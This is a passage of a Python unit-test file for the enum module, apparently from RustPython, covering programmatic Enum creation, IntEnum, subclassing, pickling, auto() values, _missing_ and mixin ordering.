e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_string_list(self):
SummerMonth = Enum('SummerMonth', ['june', 'july', 'august'])
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_string_list_with_start(self):
SummerMonth = Enum('SummerMonth', ['june', 'july', 'august'], start=20)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 20):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_iterable(self):
SummerMonth = Enum(
'SummerMonth',
(('june', 1), ('july', 2), ('august', 3))
)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_from_dict(self):
SummerMonth = Enum(
'SummerMonth',
OrderedDict((('june', 1), ('july', 2), ('august', 3)))
)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type(self):
SummerMonth = Enum('SummerMonth', 'june july august', type=int)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type_with_start(self):
SummerMonth = Enum('SummerMonth', 'june july august', type=int, start=30)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 30):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type_from_subclass(self):
SummerMonth = IntEnum('SummerMonth', 'june july august')
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type_from_subclass_with_start(self):
SummerMonth = IntEnum('SummerMonth', 'june july august', start=40)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 40):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_subclassing(self):
if isinstance(Name, Exception):
raise Name
self.assertEqual(Name.BDFL, 'Guido van Rossum')
self.assertTrue(Name.BDFL, Name('Guido van Rossum'))
self.assertIs(Name.BDFL, getattr(Name, 'BDFL'))
test_pickle_dump_load(self.assertIs, Name.BDFL)
def test_extending(self):
class Color(Enum):
red = 1
green = 2
blue = 3
with self.assertRaises(TypeError):
class MoreColor(Color):
cyan = 4
magenta = 5
yellow = 6
with self.assertRaisesRegex(TypeError, "EvenMoreColor: cannot extend enumeration 'Color'"):
class EvenMoreColor(Color, IntEnum):
chartruese = 7
def test_exclude_methods(self):
class whatever(Enum):
this = 'that'
these = 'those'
def really(self):
return 'no, not %s' % self.value
self.assertIsNot(type(whatever.really), whatever)
self.assertEqual(whatever.this.really(), 'no, not that')
def test_wrong_inheritance_order(self):
with self.assertRaises(TypeError):
class Wrong(Enum, str):
NotHere = 'error before this point'
def test_intenum_transitivity(self):
class number(IntEnum):
one = 1
two = 2
three = 3
class numero(IntEnum):
uno = 1
dos = 2
tres = 3
self.assertEqual(number.one, numero.uno)
self.assertEqual(number.two, numero.dos)
self.assertEqual(number.three, numero.tres)
def test_wrong_enum_in_call(self):
class Monochrome(Enum):
black = 0
white = 1
class Gender(Enum):
male = 0
female = 1
self.assertRaises(ValueError, Monochrome, Gender.male)
def test_wrong_enum_in_mixed_call(self):
class Monochrome(IntEnum):
black = 0
white = 1
class Gender(Enum):
male = 0
female = 1
self.assertRaises(ValueError, Monochrome, Gender.male)
def test_mixed_enum_in_call_1(self):
class Monochrome(IntEnum):
black = 0
white = 1
class Gender(IntEnum):
male = 0
female = 1
self.assertIs(Monochrome(Gender.female), Monochrome.white)
def test_mixed_enum_in_call_2(self):
class Monochrome(Enum):
black = 0
white = 1
class Gender(IntEnum):
male = 0
female = 1
self.assertIs(Monochrome(Gender.male), Monochrome.black)
def test_flufl_enum(self):
class Fluflnum(Enum):
def __int__(self):
return int(self.value)
class MailManOptions(Fluflnum):
option1 = 1
option2 = 2
option3 = 3
self.assertEqual(int(MailManOptions.option1), 1)
def test_introspection(self):
class Number(IntEnum):
one = 100
two = 200
self.assertIs(Number.one._member_type_, int)
self.assertIs(Number._member_type_, int)
class String(str, Enum):
yarn = 'soft'
rope = 'rough'
wire = 'hard'
self.assertIs(String.yarn._member_type_, str)
self.assertIs(String._member_type_, str)
class Plain(Enum):
vanilla = 'white'
one = 1
self.assertIs(Plain.vanilla._member_type_, object)
self.assertIs(Plain._member_type_, object)
def test_no_such_enum_member(self):
class Color(Enum):
red = 1
green = 2
blue = 3
with self.assertRaises(ValueError):
Color(4)
with self.assertRaises(KeyError):
Color['chartreuse']
def test_new_repr(self):
class Color(Enum):
red = 1
green = 2
blue = 3
def __repr__(self):
return "don't you just love shades of %s?" % self.name
self.assertEqual(
repr(Color.blue),
"don't you just love shades of blue?",
)
def test_inherited_repr(self):
class MyEnum(Enum):
def __repr__(self):
return "My name is %s." % self.name
class MyIntEnum(int, MyEnum):
this = 1
that = 2
theother = 3
self.assertEqual(repr(MyIntEnum.that), "My name is that.")
def test_multiple_mixin_mro(self):
class auto_enum(type(Enum)):
def __new__(metacls, cls, bases, classdict):
temp = type(classdict)()
names = set(classdict._member_names)
i = 0
for k in classdict._member_names:
v = classdict[k]
if v is Ellipsis:
v = i
else:
i = v
i += 1
temp[k] = v
for k, v in classdict.items():
if k not in names:
temp[k] = v
return super(auto_enum, metacls).__new__(
metacls, cls, bases, temp)
class AutoNumberedEnum(Enum, metaclass=auto_enum):
pass
class AutoIntEnum(IntEnum, metaclass=auto_enum):
pass
class TestAutoNumber(AutoNumberedEnum):
a = ...
b = 3
c = ...
class TestAutoInt(AutoIntEnum):
a = ...
b = 3
c = ...
def test_subclasses_with_getnewargs(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __getnewargs__(self):
return self._args
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(type(self).__name__,
self.__name__,
int.__repr__(self))
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int(other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_subclasses_with_getnewargs_ex(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __getnewargs_ex__(self):
return self._args, {}
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(type(self).__name__,
self.__name__,
int.__repr__(self))
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int(other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_with_reduce(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __reduce__(self):
return self.__class__, self._args
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(type(self).__name__,
self.__name__,
int.__repr__(self))
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int(other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_with_reduce_ex(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __reduce_ex__(self, proto):
return self.__class__, self._args
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(type(self).__name__,
self.__name__,
int.__repr__(self))
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int(other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_without_direct_pickle_support(self):
class NamedInt(int):
__qualname__ = 'NamedInt'
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(type(self).__name__,
self.__name__,
int.__repr__(self))
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int(other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI'
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_exception(self.assertRaises, TypeError, NEI.x)
test_pickle_exception(self.assertRaises, PicklingError, NEI)
def test_subclasses_without_direct_pickle_support_using_name(self):
class NamedInt(int):
__qualname__ = 'NamedInt'
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(type(self).__name__,
self.__name__,
int.__repr__(self))
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int(other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI'
x = ('the-x', 1)
y = ('the-y', 2)
def __reduce_ex__(self, proto):
return getattr, (self.__class__, self._name_)
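# Pickling by name: on load the member is re-fetched as getattr(NEI, 'x'),
# which works even though NamedInt itself defines no pickle support.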
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_tuple_subclass(self):
class SomeTuple(tuple, Enum):
__qualname__ = 'SomeTuple' # needed for pickle protocol 4
first = (1, 'for the money')
second = (2, 'for the show')
third = (3, 'for the music')
self.assertIs(type(SomeTuple.first), SomeTuple)
self.assertIsInstance(SomeTuple.second, tuple)
self.assertEqual(SomeTuple.third, (3, 'for the music'))
globals()['SomeTuple'] = SomeTuple
test_pickle_dump_load(self.assertIs, SomeTuple.first)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_duplicate_values_give_unique_enum_items(self):
class AutoNumber(Enum):
first = ()
second = ()
third = ()
def __new__(cls):
value = len(cls.__members__) + 1
obj = object.__new__(cls)
obj._value_ = value
return obj
def __int__(self):
return int(self._value_)
self.assertEqual(
list(AutoNumber),
[AutoNumber.first, AutoNumber.second, AutoNumber.third],
)
self.assertEqual(int(AutoNumber.second), 2)
self.assertEqual(AutoNumber.third.value, 3)
self.assertIs(AutoNumber(1), AutoNumber.first)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_inherited_new_from_enhanced_enum(self):
class AutoNumber(Enum):
def __new__(cls):
value = len(cls.__members__) + 1
obj = object.__new__(cls)
obj._value_ = value
return obj
def __int__(self):
return int(self._value_)
class Color(AutoNumber):
red = ()
green = ()
blue = ()
self.assertEqual(list(Color), [Color.red, Color.green, Color.blue])
self.assertEqual(list(map(int, Color)), [1, 2, 3])
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_inherited_new_from_mixed_enum(self):
class AutoNumber(IntEnum):
def __new__(cls):
value = len(cls.__members__) + 1
obj = int.__new__(cls, value)
obj._value_ = value
return obj
class Color(AutoNumber):
red = ()
green = ()
blue = ()
self.assertEqual(list(Color), [Color.red, Color.green, Color.blue])
self.assertEqual(list(map(int, Color)), [1, 2, 3])
def test_equality(self):
class AlwaysEqual:
def __eq__(self, other):
return True
class OrdinaryEnum(Enum):
a = 1
self.assertEqual(AlwaysEqual(), OrdinaryEnum.a)
self.assertEqual(OrdinaryEnum.a, AlwaysEqual())
def test_ordered_mixin(self):
class OrderedEnum(Enum):
def __ge__(self, other):
if self.__class__ is other.__class__:
return self._value_ >= other._value_
return NotImplemented
def __gt__(self, other):
if self.__class__ is other.__class__:
return self._value_ > other._value_
return NotImplemented
def __le__(self, other):
if self.__class__ is other.__class__:
return self._value_ <= other._value_
return NotImplemented
def __lt__(self, other):
if self.__class__ is other.__class__:
return self._value_ < other._value_
return NotImplemented
class Grade(OrderedEnum):
A = 5
B = 4
C = 3
D = 2
F = 1
self.assertGreater(Grade.A, Grade.B)
self.assertLessEqual(Grade.F, Grade.C)
self.assertLess(Grade.D, Grade.A)
self.assertGreaterEqual(Grade.B, Grade.B)
self.assertEqual(Grade.B, Grade.B)
self.assertNotEqual(Grade.C, Grade.D)
def test_extending2(self):
class Shade(Enum):
def shade(self):
print(self.name)
class Color(Shade):
red = 1
green = 2
blue = 3
with self.assertRaises(TypeError):
class MoreColor(Color):
cyan = 4
magenta = 5
yellow = 6
def test_extending3(self):
class Shade(Enum):
def shade(self):
return self.name
class Color(Shade):
def hex(self):
return '%s hexlified!' % self.value
class MoreColor(Color):
cyan = 4
magenta = 5
yellow = 6
self.assertEqual(MoreColor.magenta.hex(), '5 hexlified!')
def test_subclass_duplicate_name(self):
class Base(Enum):
def test(self):
pass
class Test(Base):
test = 1
self.assertIs(type(Test.test), Test)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_subclass_duplicate_name_dynamic(self):
from types import DynamicClassAttribute
class Base(Enum):
@DynamicClassAttribute
def test(self):
return 'dynamic'
class Test(Base):
test = 1
self.assertEqual(Test.test.test, 'dynamic')
def test_no_duplicates(self):
class UniqueEnum(Enum):
def __init__(self, *args):
cls = self.__class__
if any(self.value == e.value for e in cls):
a = self.name
e = cls(self.value).name
raise ValueError(
"aliases not allowed in UniqueEnum: %r --> %r"
% (a, e)
)
class Color(UniqueEnum):
red = 1
green = 2
blue = 3
with self.assertRaises(ValueError):
class Color(UniqueEnum):
red = 1
green = 2
blue = 3
grene = 2
def test_init(self):
class Planet(Enum):
MERCURY = (3.303e+23, 2.4397e6)
VENUS = (4.869e+24, 6.0518e6)
EARTH = (5.976e+24, 6.37814e6)
MARS = (6.421e+23, 3.3972e6)
JUPITER = (1.9e+27, 7.1492e7)
SATURN = (5.688e+26, 6.0268e7)
URANUS = (8.686e+25, 2.5559e7)
NEPTUNE = (1.024e+26, 2.4746e7)
def __init__(self, mass, radius):
self.mass = mass # in kilograms
self.radius = radius # in meters
@property
def surface_gravity(self):
# universal gravitational constant (m3 kg-1 s-2)
G = 6.67300E-11
return G * self.mass / (self.radius * self.radius)
self.assertEqual(round(Planet.EARTH.surface_gravity, 2), 9.80)
self.assertEqual(Planet.EARTH.value, (5.976e+24, 6.37814e6))
def test_ignore(self):
class Period(timedelta, Enum):
'''
different lengths of time
'''
def __new__(cls, value, period):
obj = timedelta.__new__(cls, value)
obj._value_ = value
obj.period = period
return obj
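# _ignore_ (next line) strips the helper names 'Period' and 'i' so they
# never become enum members while the class body executes.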
_ignore_ = 'Period i'
Period = vars()
for i in range(13):
Period['month_%d' % i] = i*30, 'month'
for i in range(53):
Period['week_%d' % i] = i*7, 'week'
for i in range(32):
Period['day_%d' % i] = i, 'day'
OneDay = day_1
OneWeek = week_1
OneMonth = month_1
self.assertFalse(hasattr(Period, '_ignore_'))
self.assertFalse(hasattr(Period, 'Period'))
self.assertFalse(hasattr(Period, 'i'))
self.assertTrue(isinstance(Period.day_1, timedelta))
self.assertTrue(Period.month_1 is Period.day_30)
self.assertTrue(Period.week_4 is Period.day_28)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_nonhash_value(self):
class AutoNumberInAList(Enum):
def __new__(cls):
value = [len(cls.__members__) + 1]
obj = object.__new__(cls)
obj._value_ = value
return obj
class ColorInAList(AutoNumberInAList):
red = ()
green = ()
blue = ()
self.assertEqual(list(ColorInAList), [ColorInAList.red, ColorInAList.green, ColorInAList.blue])
for enum, value in zip(ColorInAList, range(3)):
value += 1
self.assertEqual(enum.value, [value])
self.assertIs(ColorInAList([value]), enum)
def test_conflicting_types_resolved_in_new(self):
class LabelledIntEnum(int, Enum):
def __new__(cls, *args):
value, label = args
obj = int.__new__(cls, value)
obj.label = label
obj._value_ = value
return obj
class LabelledList(LabelledIntEnum):
unprocessed = (1, "Unprocessed")
payment_complete = (2, "Payment Complete")
self.assertEqual(list(LabelledList), [LabelledList.unprocessed, LabelledList.payment_complete])
self.assertEqual(LabelledList.unprocessed, 1)
self.assertEqual(LabelledList(1), LabelledList.unprocessed)
def test_auto_number(self):
class Color(Enum):
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 1)
self.assertEqual(Color.blue.value, 2)
self.assertEqual(Color.green.value, 3)
def test_auto_name(self):
class Color(Enum):
def _generate_next_value_(name, start, count, last):
return name
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 'red')
self.assertEqual(Color.blue.value, 'blue')
self.assertEqual(Color.green.value, 'green')
def test_auto_name_inherit(self):
class AutoNameEnum(Enum):
def _generate_next_value_(name, start, count, last):
return name
class Color(AutoNameEnum):
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 'red')
self.assertEqual(Color.blue.value, 'blue')
self.assertEqual(Color.green.value, 'green')
def test_auto_garbage(self):
class Color(Enum):
red = 'red'
blue = auto()
self.assertEqual(Color.blue.value, 1)
def test_auto_garbage_corrected(self):
class Color(Enum):
red = 'red'
blue = 2
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 'red')
self.assertEqual(Color.blue.value, 2)
self.assertEqual(Color.green.value, 3)
def test_auto_order(self):
with self.assertRaises(TypeError):
class Color(Enum):
red = auto()
green = auto()
blue = auto()
def _generate_next_value_(name, start, count, last):
return name
def test_auto_order_weird(self):
weird_auto = auto()
weird_auto.value = 'pathological case'
class Color(Enum):
red = weird_auto
def _generate_next_value_(name, start, count, last):
return name
blue = auto()
self.assertEqual(list(Color), [Color.red, Color.blue])
self.assertEqual(Color.red.value, 'pathological case')
self.assertEqual(Color.blue.value, 'blue')
def test_duplicate_auto(self):
class Dupes(Enum):
first = primero = auto()
second = auto()
third = auto()
self.assertEqual([Dupes.first, Dupes.second, Dupes.third], list(Dupes))
def test_default_missing(self):
class Color(Enum):
RED = 1
GREEN = 2
BLUE = 3
try:
Color(7)
except ValueError as exc:
self.assertTrue(exc.__context__ is None)
else:
raise Exception('Exception not raised.')
def test_missing(self):
class Color(Enum):
red = 1
green = 2
blue = 3
@classmethod
def _missing_(cls, item):
if item == 'three':
return cls.blue
elif item == 'bad return':
# trigger internal error
return 5
elif item == 'error out':
raise ZeroDivisionError
else:
# trigger not found
return None
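# _missing_ contract exercised below: return a member to resolve the lookup,
# return any non-member to trigger a chained TypeError, or raise to propagate.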
self.assertIs(Color('three'), Color.blue)
try:
Color(7)
except ValueError as exc:
self.assertTrue(exc.__context__ is None)
else:
raise Exception('Exception not raised.')
try:
Color('bad return')
except TypeError as exc:
self.assertTrue(isinstance(exc.__context__, ValueError))
else:
raise Exception('Exception not raised.')
try:
Color('error out')
except ZeroDivisionError as exc:
self.assertTrue(isinstance(exc.__context__, ValueError))
else:
raise Exception('Exception not raised.')
def test_multiple_mixin(self):
class MaxMixin:
@classproperty
def MAX(cls):
max = len(cls)
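# cache the computed value on the class so later lookups bypass this property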
cls.MAX = max
return max
class StrMixin:
def __str__(self):
return self._name_.lower()
class SomeEnum(Enum):
def behavior(self):
return 'booyah'
class AnotherEnum(Enum):
def behavior(self):
return 'nuhuh!'
def social(self):
return "what's up?"
class Color(MaxMixin, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 3)
self.assertEqual(Color.MAX, 3)
self.assertEqual(str(Color.BLUE), 'Color.BLUE')
class Color(MaxMixin, StrMixin, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 3)
self.assertEqual(Color.MAX, 3)
self.assertEqual(str(Color.BLUE), 'blue')
class Color(StrMixin, MaxMixin, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 3)
self.assertEqual(Color.MAX, 3)
self.assertEqual(str(Color.BLUE), 'blue')
class CoolColor(StrMixin, SomeEnum, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(CoolColor.RED.value, 1)
self.assertEqual(CoolColor.GREEN.value, 2)
self.assertEqual(CoolColor.BLUE.value, 3)
self.assertEqual(str(CoolColor.BLUE), 'blue')
self.assertEqual(CoolColor.RED.behavior(), 'booyah')
class CoolerColor(StrMixin, AnotherEnum, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(CoolerColor.RED.value, 1)
self.assertEqual(CoolerColor.GREEN.value, 2)
self.assertEqual(CoolerColor.BLUE.value, 3)
self.assertEqual(str(CoolerColor.BLUE), 'blue')
self.assertEqual(CoolerColor.RED.behavior(), 'nuhuh!')
self.assertEqual(CoolerColor.RED.social(), "what's up?")
class CoolestColor(StrMixin, SomeEnum, AnotherEnum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(CoolestColor.RED.value, 1)
self.assertEqual(CoolestColor.GREEN.value, 2)
self.assertEqual(CoolestColor.BLUE.value, 3)
self.assertEqual(str(CoolestColor.BLUE), 'blue')
self.assertEqual(CoolestColor.RED.behavior(), 'booyah')
self.assertEqual(CoolestColor.RED.social(), "what's up?")
class ConfusedColor(StrMixin, AnotherEnum, SomeEnum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(ConfusedColor.RED.value, 1)
self.assertEqual(ConfusedColor.GREEN.value, 2)
self.assertEqual(ConfusedColor.BLUE.value, 3)
self.assertEqual(str(ConfusedColor.BLUE), 'blue')
self.assertEqual(ConfusedColor.RED.behavior(), 'nuhuh!')
self.assertEqual(ConfusedColor.RED.social(), "what's up?")
class ReformedColor(StrMixin, IntEnum, SomeEnum, AnotherEnum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(ReformedColor.RED.value, 1)
self.assertEqual(ReformedColor.GREEN.value, 2)
self.assertEqual(ReformedColor.BLUE.value, 3)
self.assertEqual(str(ReformedColor.BLUE), 'blue')
